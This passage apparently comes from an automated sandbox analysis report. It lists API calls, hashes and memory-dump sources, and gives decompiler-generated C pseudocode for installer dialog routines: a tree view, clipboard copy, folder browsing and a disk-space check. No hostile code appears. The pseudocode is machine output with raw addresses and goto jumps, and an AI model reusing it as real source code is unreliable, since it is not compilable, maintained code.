GetDlgItem.USER32 ref: 00404F1D

Part of subcall function 00403DDC: SendMessageA.USER32(00000028,?,00000001,00403C0F), ref: 00403DEA

GetClientRect.USER32 ref: 00404F4B
GetSystemMetrics.USER32 ref: 00404F53
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F74
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F85
SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F98
SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FA6
SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FB9
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FDB
ShowWindow.USER32(?,00000008), ref: 00404FEF
GetDlgItem.USER32 ref: 00405005
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405015
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040502E
SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040503A
GetDlgItem.USER32 ref: 00405057
CreateThread.KERNEL32 ref: 00405065
CloseHandle.KERNEL32(00000000), ref: 0040506C
ShowWindow.USER32(00000000), ref: 00405090
ShowWindow.USER32(?,00000008), ref: 00405095
ShowWindow.USER32(00000008), ref: 004050DB
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040510D
CreatePopupMenu.USER32 ref: 0040511E
AppendMenuA.USER32 ref: 00405133
GetWindowRect.USER32 ref: 00405146
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405168
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051A3
OpenClipboard.USER32(00000000), ref: 004051B3
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051B9
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051C2
GlobalLock.KERNEL32 ref: 004051CC
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051E0
lstrlenA.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,?,00000000), ref: 004051FE
SetClipboardData.USER32 ref: 00405209
CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040520F

Strings

{, xrefs: 004050FA

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
String ID: {
API String ID: 1050754034-366298937
Opcode ID: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
Instruction ID: 09b722d0185256cc624264d40bb0edb6627bdfa233c056c1d5ba82df3b217a72
Opcode Fuzzy Hash: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
Instruction Fuzzy Hash: 0FA14B70900208FFDB11AF64DD89AAE7F79FB48354F10812AFA05BA1A1C7785E41DF69

Uniqueness

Uniqueness Score: -1.00%

Function 004046A7, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 477
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E004046A7(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				struct HBITMAP__* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				void* _t252;
				intOrPtr _t258;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x7a2fa8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x7a2f88 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x7a2f91 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404627(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x7a2f90) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x79f564;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x79f578;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x79f564 = _t315;
								 *0x79f578 = _t315;
								 *0x7a2fe0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x7a2f91 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E00401410(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x79f578;
									_t196 =  *0x7a2fa8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x7a2fac <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x7a275c + 0x10)) != _t315) {
											E00404545(0x3ff, 0xfffffffb, E004045FA(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x7a2fac);
									goto L84;
								} else {
									_t282 = E004012E2( *0x79f578);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x7a2fe0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x79f578 = GlobalAlloc(0x40,  *0x7a2fac << 2);
					_v24 = LoadBitmapA( *0x7a2f80, 0x6e);
					 *0x79f574 = SetWindowLongA(_v8, 0xfffffffc, E00404CA1);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x79f564 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x79f564);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if(_t258 != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							_push(_t258);
							_push(_t315);
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059E1(_t286, _t315, _t320)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403DA7(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403DA7(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x7a2fac <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x79f578 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x79f578 + _t318 * 4) = _t274;
									_t288 =  *( *0x79f578 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x7a2fac);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403DDC(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403DDC(_v12);
								L89:
								return E00403E0E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x004046c5
0x004046cb
0x004046cd
0x004046d3
0x004046d9
0x004046e6
0x004046ef
0x004046f2
0x004046f5
0x00404916
0x0040491d
0x00404931
0x0040491f
0x00404921
0x00404924
0x00404925
0x0040492c
0x0040492c
0x0040493d
0x0040494b
0x0040494e
0x00404964
0x004049dc
0x004049df
0x004049e1
0x004049eb
0x004049f9
0x004049f9
0x004049fb
0x00404a05
0x00404a0b
0x00404a2c
0x00404a0d
0x00404a1a
0x00404a1a
0x00404a0b
0x00404a05
0x00000000
0x004049df
0x00404969
0x00404974
0x00404979
0x00404980
0x00404987
0x00404991
0x00404991
0x00404995
0x0040499a
0x0040499f
0x004049b5
0x004049a1
0x004049a1
0x004049a9
0x004049b0
0x004049ab
0x004049ab
0x004049ab
0x004049a9
0x004049b9
0x004049bb
0x004049c9
0x004049ca
0x004049d6
0x004049d9
0x004049d9
0x0040499a
0x00000000
0x00404987
0x0040496b
0x00404972
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a2f
0x00404a2f
0x00404a36
0x00404aaa
0x00404ab1
0x00404abd
0x00404abd
0x00404ac6
0x00404ac8
0x00404acf
0x00404ad2
0x00404ad2
0x00404ad8
0x00404adf
0x00404ae2
0x00404ae2
0x00404ae8
0x00404aee
0x00404af4
0x00404af4
0x00404b01
0x00404c4e
0x00404c55
0x00404c72
0x00404c78
0x00404c8a
0x00404c8a
0x00000000
0x00404b07
0x00404b09
0x00404b11
0x00404b15
0x00404b15
0x00404b1d
0x00404b5e
0x00404b60
0x00404b70
0x00404b73
0x00404b78
0x00404b7f
0x00404b82
0x00404c24
0x00404c2a
0x00404c38
0x00404c49
0x00404c49
0x00000000
0x00404c38
0x00404b88
0x00404b8b
0x00404b91
0x00404b96
0x00404b98
0x00404b9a
0x00404ba0
0x00404ba7
0x00404bac
0x00404bb3
0x00404bb6
0x00404bb6
0x00404bbd
0x00404bc9
0x00404bcd
0x00404bcf
0x00404bcf
0x00404bbf
0x00404bc1
0x00404bc1
0x00404bef
0x00404bfb
0x00404c0a
0x00404c0a
0x00404c0c
0x00404c0f
0x00404c18
0x00000000
0x00404b1f
0x00404b2a
0x00404b2d
0x00404b32
0x00404b34
0x00404b38
0x00404b48
0x00404b52
0x00404b54
0x00404b57
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b3a
0x00404b3a
0x00404b40
0x00404b42
0x00404b42
0x00404b43
0x00404b44
0x00000000
0x00404b3a
0x00404b1d
0x00404b01
0x00404a3e
0x00000000
0x00404a54
0x00404a5e
0x00404a63
0x00000000
0x00000000
0x00404a75
0x00404a7a
0x00404a86
0x00404a86
0x00404a88
0x00404a97
0x00404a99
0x00404aa0
0x00404aa3
0x00000000
0x00404aa3
0x00404a3e
0x004046fb
0x00404700
0x0040470a
0x0040470b
0x00404714
0x0040471f
0x0040473a
0x0040474c
0x00404751
0x0040475c
0x00404765
0x0040477a
0x0040478b
0x00404798
0x00404798
0x0040479d
0x004047a3
0x004047a5
0x004047a8
0x004047ad
0x004047b2
0x004047b4
0x004047b4
0x004047b7
0x004047b8
0x004047d4
0x004047d4
0x004047d6
0x004047d7
0x004047dc
0x004047df
0x004047e2
0x004047e6
0x004047eb
0x004047f0
0x004047f4
0x004047f9
0x004047fe
0x00404800
0x00404808
0x004048d2
0x004048e5
0x00000000
0x0040480e
0x00404811
0x00404814
0x00404817
0x00404817
0x0040481d
0x00404823
0x00404826
0x0040482c
0x0040482d
0x00404832
0x0040483b
0x00404842
0x00404845
0x00404848
0x0040484b
0x00404887
0x004048b0
0x00404889
0x00404896
0x00404896
0x0040484d
0x00404850
0x0040485f
0x00404869
0x00404871
0x00404878
0x00404880
0x00404880
0x0040484b
0x004048b6
0x004048b7
0x004048c3
0x004048c3
0x004048d0
0x004048eb
0x004048ef
0x0040490c
0x00404911
0x00404914
0x00000000
0x004048f1
0x004048f6
0x004048ff
0x00404c8c
0x00404c9e
0x00404c9e
0x004048ef
0x00000000
0x004048d0
0x00404808

APIs

GetDlgItem.USER32 ref: 004046BE
GetDlgItem.USER32 ref: 004046CB
GlobalAlloc.KERNEL32(00000040,?), ref: 00404717
LoadBitmapA.USER32 ref: 0040472A
SetWindowLongA.USER32 ref: 0040473D
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404751
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404765
SendMessageA.USER32(?,00001109,00000002), ref: 0040477A
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404786
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404798
DeleteObject.GDI32(?), ref: 0040479D
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047C8
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047D4
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404869
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404894
SendMessageA.USER32(?,00001100,00000000,?), ref: 004048A8
GetWindowLongA.USER32 ref: 004048D7
SetWindowLongA.USER32 ref: 004048E5
ShowWindow.USER32(?,00000005), ref: 004048F6
SendMessageA.USER32(?,00000419,00000000,?), ref: 004049F9
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A5E
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A73
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A97
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404ABD
ImageList_Destroy.COMCTL32(?), ref: 00404AD2
GlobalFree.KERNEL32 ref: 00404AE2
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B52
SendMessageA.USER32(?,00001102,00000410,?), ref: 00404BFB
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C0A
InvalidateRect.USER32(?,00000000,00000001), ref: 00404C2A
ShowWindow.USER32(?,00000000), ref: 00404C78
GetDlgItem.USER32 ref: 00404C83
ShowWindow.USER32(00000000), ref: 00404C8A

Strings

N, xrefs: 00404934
M, xrefs: 00404850
, xrefs: 00404C62

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
Instruction ID: 9804f70a80ad740571f010f4d41a056d70bc73ca34169b501aedef0055c070ba
Opcode Fuzzy Hash: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
Instruction Fuzzy Hash: 3C029EB0D00208EFEB10DF64CD45AAE7BB5EB84315F10817AF610BA2E1C7799A52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004041E5, Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 242
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004041E5(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr* _t81;
				int _t86;
				int _t88;
				int _t100;
				signed int _t105;
				char* _t110;
				intOrPtr _t114;
				intOrPtr* _t128;
				signed int _t140;
				signed int _t145;
				CHAR* _t151;

				_t75 =  *0x79ed58;
				_v36 = _t75;
				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x7a4000;
				_v12 =  *((intOrPtr*)(_t75 + 0x38));
				if(_a8 == 0x40b) {
					E004052A3(0x3fb, _t151);
					E00405BFB(_t151);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L19:
						if(_a8 == 0x40f) {
							L21:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_t145 = _t144 | 0xffffffff;
							E004052A3(0x3fb, _t151);
							if(E004055AC(_t169, _t151) == 0) {
								_v8 = 1;
							}
							E004059BF(0x79e550, _t151);
							_t80 = E0040555F(0x79e550);
							if(_t80 != 0) {
								 *_t80 =  *_t80 & 0x00000000;
							}
							_t81 = E00405CD2("KERNEL32.dll", "GetDiskFreeSpaceExA");
							if(_t81 == 0) {
								L28:
								_t86 = GetDiskFreeSpaceA(0x79e550,  &_v20,  &_v28,  &_v16,  &_v40);
								__eflags = _t86;
								if(_t86 == 0) {
									goto L31;
								}
								_t100 = _v20 * _v28;
								__eflags = _t100;
								_t145 = MulDiv(_t100, _v16, 0x400);
								goto L30;
							} else {
								_push( &_v32);
								_push( &_v24);
								_push( &_v44);
								_push(0x79e550);
								if( *_t81() == 0) {
									goto L28;
								}
								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
								L30:
								_v12 = 1;
								L31:
								if(_t145 < E004045FA(5)) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x7a275c + 0x10)) != 0) {
									E00404545(0x3ff, 0xfffffffb, _t87);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, 0x400, 0x79e540);
									} else {
										E00404545(0x400, 0xfffffffc, _t145);
									}
								}
								_t88 = _v8;
								 *0x7a3024 = _t88;
								if(_t88 == 0) {
									_v8 = E00401410(7);
								}
								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
									_v8 = 0;
								}
								E00403DC9(0 | _v8 == 0x00000000);
								if(_v8 == 0 &&  *0x79f570 == 0) {
									E0040417A();
								}
								 *0x79f570 = 0;
								goto L45;
							}
						}
						_t169 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L45;
						}
						goto L21;
					}
					_t105 = _a12 & 0x0000ffff;
					if(_t105 != 0x3fb) {
						L12:
						if(_t105 == 0x3e9) {
							_t140 = 7;
							memset( &_v72, 0, _t140 << 2);
							_t144 = 0x79f580;
							_v76 = _a4;
							_v68 = 0x79f580;
							_v56 = E004044DF;
							_v52 = _t151;
							_v64 = E004059E1(0x3fb, 0x79f580, _t151);
							_t110 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t110, 0x79e958, _v12);
							if(_t110 == 0) {
								_a8 = 0x40f;
							} else {
								E0040521C(0, _t110);
								E004054CC(_t151);
								_t114 =  *((intOrPtr*)( *0x7a2f88 + 0x11c));
								if(_t114 != 0) {
									_push(_t114);
									_push(0);
									E004059E1(0x3fb, 0x79f580, _t151);
									_t144 = 0x7a1f20;
									if(lstrcmpiA(0x7a1f20, 0x79f580) != 0) {
										lstrcatA(_t151, 0x7a1f20);
									}
								}
								 *0x79f570 =  *0x79f570 + 1;
								SetDlgItemTextA(_a4, 0x3fb, _t151);
							}
						}
						goto L19;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L45;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t144 = GetDlgItem(_a4, 0x3fb);
					if(E00405538(_t151) != 0 && E0040555F(_t151) == 0) {
						E004054CC(_t151);
					}
					 *0x7a2758 = _a4;
					SetWindowTextA(_t144, _t151);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403DA7(_a4);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403DA7(_a4);
					E00403DDC(_t144);
					_t128 = E00405CD2("shlwapi.dll", "SHAutoComplete");
					if(_t128 == 0) {
						L45:
						return E00403E0E(_a8, _a12, _a16);
					}
					 *_t128(_t144, 1);
					goto L8;
				}
			}

0x004041eb
0x004041f2
0x004041fe
0x0040420c
0x00404214
0x00404218
0x0040421e
0x0040421e
0x0040422a
0x004042a4
0x004042ab
0x00404377
0x0040437e
0x0040438d
0x0040438d
0x00404391
0x00404397
0x0040439a
0x004043a7
0x004043a9
0x004043a9
0x004043b7
0x004043bd
0x004043c4
0x004043c6
0x004043c6
0x004043d3
0x004043df
0x00404403
0x00404414
0x0040441a
0x0040441c
0x00000000
0x00000000
0x00404422
0x00404422
0x00404430
0x00000000
0x004043e1
0x004043e4
0x004043e8
0x004043ec
0x004043ed
0x004043f2
0x00000000
0x00000000
0x004043fa
0x00404432
0x00404432
0x00404439
0x00404442
0x00404444
0x00404444
0x00404456
0x00404460
0x00404468
0x0040447e
0x0040446a
0x0040446e
0x0040446e
0x00404468
0x00404483
0x00404488
0x0040448d
0x00404496
0x00404496
0x0040449f
0x004044a1
0x004044a1
0x004044ad
0x004044b5
0x004044bf
0x004044bf
0x004044c4
0x00000000
0x004044c4
0x004043df
0x00404380
0x00404387
0x00000000
0x00000000
0x00000000
0x00404387
0x004042b1
0x004042b7
0x004042d1
0x004042d6
0x004042e0
0x004042e7
0x004042ec
0x004042f6
0x004042f9
0x004042fc
0x00404303
0x0040430b
0x0040430e
0x00404312
0x00404319
0x00404321
0x00404370
0x00404323
0x00404324
0x0040432a
0x00404334
0x0040433c
0x0040433e
0x0040433f
0x00404341
0x00404347
0x00404355
0x00404359
0x00404359
0x00404355
0x0040435e
0x00404369
0x00404369
0x00404321
0x00000000
0x004042d6
0x004042c4
0x00000000
0x00000000
0x004042ca
0x00000000
0x0040422c
0x00404237
0x00404240
0x0040424d
0x0040424d
0x00404257
0x0040425c
0x00404265
0x00404268
0x0040426d
0x00404275
0x00404278
0x0040427d
0x00404283
0x00404292
0x00404299
0x004044ca
0x004044dc
0x004044dc
0x004042a2
0x00000000
0x004042a2

APIs

GetDlgItem.USER32 ref: 00404230
SetWindowTextA.USER32(00000000,?), ref: 0040425C
SHBrowseForFolderA.SHELL32(?,0079E958,?), ref: 00404319
lstrcmpiA.KERNEL32(007A1F20,0079F580,00000000,?,?,00000000), ref: 0040434D
lstrcatA.KERNEL32(?,007A1F20), ref: 00404359
SetDlgItemTextA.USER32 ref: 00404369

Part of subcall function 004052A3: GetDlgItemTextA.USER32 ref: 004052B6

Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75

GetDiskFreeSpaceA.KERNEL32(0079E550,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,0079E550,0079E550,?,?,000003FB,?), ref: 00404414
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040442A
SetDlgItemTextA.USER32 ref: 0040447E

Strings

